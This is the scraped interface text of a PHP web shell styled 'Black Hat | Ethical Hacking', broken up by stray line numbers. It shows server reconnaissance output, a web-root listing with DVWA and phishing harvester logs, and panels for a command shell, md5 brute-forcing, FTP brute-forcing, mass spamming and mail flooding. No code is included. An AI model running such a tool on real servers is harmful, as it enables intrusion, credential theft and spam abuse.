1306 | 1307 | 1314 | 1315 | 1320 | 1321 | 1326 | 1327 | 1332 | 1333 | 1338 | 1339 | 1344 | 1345 | 1350 | 1351 | 1356 |

1308 \| .::Flooder::. 1309 \|
1310 \| log_file: 1311 \|	1312 \| 1313 \|

1316 \| Send to: 1317 \|	1318 \| 1319 \|

1322 \| From: 1323 \|	1324 \| 1325 \|

1328 \| Subject: 1329 \|	1330 \| 1331 \|

1334 \| Message: 1335 \|	1336 \| 1337 \|

1340 \| Amount: 1341 \|	1342 \| 1343 \|

1346 \| Check^*: 1347 \|	1348 \| 1349 \|

1352 \|	1353 \| 1354 \| 1355 \|

1357 |

1359 |

1361 |

1363 | .:[Public v1.0]:. 1364 | 1365 | 1366 | 1367 | 1368 | 1369 | 1370 | 1371 | 1372 | 1373 | 1374 | 1375 | 1376 | 1377 | 1378 | 1379 | 1380 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::. 1381 | 1382 | 1390 | 1401 | 1402 | 1403 | 1404 | 1562 | 2085 |

1405 | 1406 | 1434 | 1450 | 1560 |

1407 | 1408 | 1411 | 1414 | 1417 | 1420 | 1423 | 1426 | 1429 | 1432 |

1409 \| System: 1410 \|	1412 \| Linux 4.9.26v7-aufs #1 SMP Tue May 9 20:14:03 CEST 2017 1413 \|
1415 \| Server: 1416 \|	1418 \| Apache/2.4.29 (Debian) 1419 \|
1421 \| User: 1422 \|	1424 \| uid=33(www-data) gid=33(www-data) groups=33(www-data) 1425 \|
1427 \| pwd: 1428 \|	1430 \| /var/www/html/ 1431 \|

1433 |

1435 |

1436 | 1437 | 1438 |

1439 | .::h0ld-up-team::.
web-shell 1440 |

1441 |

1442 | 1443 | 1444 | 1445 | 1446 | 1447 |

1448 | 1449 |

1451 | 1452 | 1489 | 1506 | 1523 | 1524 | 1541 | 1558 |

1453 | 1454 | 1457 | 1460 | 1463 | 1466 | 1469 |

1455 | PHP-version: 1456 |

1458 | MySQL: 1459 |

1461 | MSSQL: 1462 |

1464 | PostgreSQL: 1465 |

1467 | Oracle: 1468 |

1470 |

1471 | 1472 | 1475 | 1478 | 1481 | 1484 | 1487 |

1473 | 7.2.4-1 1474 |

1476 | OFF 1477 |

1479 | OFF 1480 |

1482 | OFF 1483 |

1485 | OFF 1486 |

1488 |

1490 | 1493 | 1496 | 1499 | 1502 | 1505 |

1491 | Safe_mode: 1492 |

1494 | cURL: 1495 |

1497 | wget: 1498 |

1500 | fetch: 1501 |

1503 | lynx: 1504 |

1507 | 1510 | 1513 | 1516 | 1519 | 1522 |

1508 | OFF 1509 |

1511 | OFF 1512 |

1514 | ON 1515 |

1517 | OFF 1518 |

1520 | OFF 1521 |

1525 | 1528 | 1531 | 1534 | 1537 | 1540 |

1526 | Perl: 1527 |

1529 | Server time: 1530 |

1532 | Server date: 1533 |

1535 | Total space: 1536 |

1538 | Free space: 1539 |

1542 | 1545 | 1548 | 1551 | 1554 | 1557 |

1543 | ON 1544 |

1546 | 02:09 1547 |

1549 | 20-05-2018 1550 |

1552 | 28.27 GB 1553 |

1555 | 10.51 GB 1556 |

1559 |

1561 |

1563 | 1564 | 2083 |

1565 | 1566 | 1586 | 1587 | 1588 | 1589 | 1613 |

1567 |

1568 | 1569 |

1570 | total 608
1571 | drwxr-xr-x 3 root     root       4096 May 20 02:07 .
1572 | drwxr-xr-x 4 root     root       4096 Dec  8 19:23 ..
1573 | drwxr-xr-x 8 root     root       4096 Feb 13 00:25 DVWA
1574 | -rw-r--r-- 1 root     root      43771 May 20 02:06 bheh_shell.php
1575 | -rw-r--r-- 1 www-data www-data   1312 Dec  9 23:36 harvester_2017-12-08 19:06:19.297473.txt
1576 | -rw-r--r-- 1 www-data www-data   6775 Dec 18 15:51 harvester_2017-12-09 22:44:56.564493.txt
1577 | -rw-r--r-- 1 www-data www-data    660 Mar 21 19:00 harvester_2018-03-21 18:58:08.020023.txt
1578 | -rw-r--r-- 1 root     root     424947 Mar 21 18:58 index.html
1579 | -rw-r--r-- 1 root     root        612 Dec  8 19:23 index.nginx-debian.html
1580 | -rw-r--r-- 1 root     root        318 Mar 21 18:58 post.php
1581 | -rw-r--r-- 1 root     root      37723 May 20 01:30 safe.php
1582 | -rw-r--r-- 1 root     root      40575 May 20 01:29 stres.php
1583 | -rwxr-xr-x 1 root     root         99 Apr 30 20:44 updatemylinux.sh
1584 | -rw-r--r-- 1 root     root      26361 May 20 01:22 webshell.php

1585 |

1590 | 1591 | 1597 | 1611 |

1592 | .::System shell::.
1593 | 1594 | 1595 | 1596 |

1598 | 1610 |

1612 |

1614 | 1615 | 1616 |

1617 | 1618 | 1644 | 1716 | 1831 | 1851 | 1852 |

1619 |

1631 | 1643 |

1645 |

1657 | 1672 |

1673 |

1674 | 1675 | 1681 | 1715 |

1676 \| .::Alias::. 1677 \|	1678 \| 1679 \| 1680 \|
1682 \| 1714 \|

1832 | 1850 |

1853 |

1854 |

1855 | 1856 | 1886 |

1857 |

1887 |

1888 | 1889 | 1919 |

1890 |

1920 |

1921 |

1922 | 1925 | 1929 | 1930 | 1934 | 1935 | 1939 | 1940 | 1944 |

1923 \| .::md5 bruter::. 1924 \|

	1926 \| hash:	1927 \| 1928 \|

	1931 \| log_file:	1932 \| 1933 \|

	1936 \| dictionary_file:	1937 \| 1938 \|

	1941 \|	1942 \| 1943 \|

1945 |

1946 |

1947 |

1948 | 1949 | 1950 | 2081 |

1951 | 1952 | 1959 | 1964 | 1965 | 1970 | 1971 | 1976 | 1977 | 1982 | 1983 | 1988 | 1989 | 1994 |

1953 \| .::Spammer::. 1954 \|
1955 \| emails_file: 1956 \|	1957 \| 1958 \|

1960 \| log_file: 1961 \|	1962 \| 1963 \|

1966 \| From: 1967 \|	1968 \| 1969 \|

1972 \| Subject: 1973 \|	1974 \| 1975 \|

1978 \| Message: 1979 \|	1980 \| 1981 \|

1984 \| Check^*: 1985 \|	1986 \| 1987 \|

1990 \|	1991 \| 1992 \| 1993 \|

1995 |

1997 | 1998 | 1999 | 2004 | 2009 | 2010 | 2015 | 2016 | 2021 | 2022 | 2026 |

.::FTP-Brute::.
2000 \| Host: 2001 \|	2002 \| 2003 \|

2005 \| ftp_users file: 2006 \|	2007 \| 2008 \|

2011 \| ftp_passwd file: 2012 \|	2013 \| 2014 \|

2017 \| ftp_log file: 2018 \|	2019 \| 2020 \|

2023 \| 2024 \| 2025 \|

2027 |

2029 | 2030 | 2037 | 2038 | 2043 | 2044 | 2049 | 2050 | 2055 | 2056 | 2061 | 2062 | 2067 | 2068 | 2073 | 2074 | 2079 |

2031 \| .::Flooder::. 2032 \|
2033 \| log_file: 2034 \|	2035 \| 2036 \|

2039 \| Send to: 2040 \|	2041 \| 2042 \|

2045 \| From: 2046 \|	2047 \| 2048 \|

2051 \| Subject: 2052 \|	2053 \| 2054 \|

2057 \| Message: 2058 \|	2059 \| 2060 \|

2063 \| Amount: 2064 \|	2065 \| 2066 \|

2069 \| Check^*: 2070 \|	2071 \| 2072 \|

2075 \|	2076 \| 2077 \| 2078 \|

2080 |

2082 |

2084 |

2086 | .:[Public v1.0]:. 2087 | 2088 | 2089 | --------------------------------------------------------------------------------